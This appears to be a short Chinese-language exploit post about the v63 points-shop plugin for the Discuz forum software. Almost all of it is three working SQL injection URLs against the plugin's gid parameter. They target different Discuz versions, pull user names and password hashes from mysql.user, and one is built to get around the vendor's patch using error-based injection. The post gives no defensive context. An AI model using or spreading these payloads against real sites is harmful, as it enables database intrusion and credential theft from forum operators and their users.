Discuz v63积分商城插件注入&各种绕过

 

 

For Discuz X1.5-2.0
[php]
http://localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
[/php]

For Discuz X2.5
[php]
/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(host,0x3a,user),9,10,11,12,13,14 from mysql.user
[/php]

绕过Discuz修复补丁
[php]
http://localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`[/php]

发表评论